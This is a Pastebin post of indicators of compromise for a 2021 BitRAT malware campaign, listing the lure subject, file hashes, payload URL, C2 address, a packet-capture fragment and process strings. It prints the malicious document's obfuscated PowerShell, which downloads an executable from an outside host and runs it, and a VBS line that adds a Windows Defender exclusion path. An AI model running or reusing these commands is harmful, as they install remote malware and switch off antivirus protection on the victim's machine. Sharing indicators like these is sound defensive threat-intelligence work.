ExecuteMalware

2021-08-10 Bitrat IOCs

Aug 10th, 2021 (edited)
15,142
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.80 KB | None | 0 0
  1. THREAT IDENTIFICATION: BITRAT
  2.  
  3. SUBJECTS OBSERVED
  4. Separate Remittance Notice : Paper Document No: 341930290
  5.  
  6. SENDERS OBSERVED
  7.  
  8. DOCUMENT FILE HASHES
  9. Remit_Scan 8.10.21.doc
  10. 3ad29bdfead859c703ec80cca76409e5
  11.  
  12. Password
  13. 081021
  14.  
  15. POWERSHELL FROM MALDOC
  16. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=($we22='(New-Obje' + 'ct Net.We'; $b4df='bCl' + 'ient).Downlo'; $c3='adFile(''http://augustair.com/Resources/eft/edi.exe'',$env:temp+''\mail.exe'')';$TC=IEX ($we22,$b4df,$c3 -Join '');start-process($env:temp+ '\mail.exe')) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX
  17.  
  18. PAYLOAD DOWNLOAD URL
  19. http://augustair.com/Resources/eft/edi.exe
  20.  
  21. PAYLOAD FILE HASH
  22. edi.exe
  23. 537d313f3dfe75d7a9d4f36f80cce049
  24.  
  25. VBS FILE HASH
  26. _Kthavoimchnr.vbs
  27. dfeff1f15472010a44f33a0d9344cfd9
  28.  
  29. VBS FILE CONTENTS
  30. CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\analyst\AppData\Roaming\outlook.exe'", 0, False
  31.  
  32. BITRAT C2
  33. 23.94.54.231:3050
  34.  
  35. SUPPORTING EVIDENCE
  36. https://urlhaus.abuse.ch/url/1506968/
  37.  
  38. FROM THE PACKET CAPTURE
  39. ....q...m..u..|../...BdV.o......#ZZ..xz?.............k.g.9.3.....=.<.5./.....(.#...........
  40. ..... .
  41. ......................U...Q..a...>....N..V...{...:R._,...{.
  42. 5 .C...ak.(......<.%.....%q...-..~.... ...................0...0............RK.7.M.X.P.o..0
  43. . *.H..
  44. .....0.1.0
  45. ..U....BitRAT0 .
  46. 210727000000Z..21200727000000Z0.1.0
  47. ..U....BitRAT0.."0
  48. . *.H..
  49. ..........0..
  50. ......
  51.  
  52. I also saw several Ping packets to 8.8.8.8
  53. Also DNS Queries for eter102.dvrlists.com
  54.  
  55. STRINGS IN THE MAIL.EXE PROCESS
  56. # Netscape HTTP Cookie File
  57. # https://curl.haxx.se/docs/http-cookies.html
  58. # This file was generated by libcurl! Edit at your own risk.
  59.  
  60. GammaCalibrator
Add Comment
Please, Sign In to add comment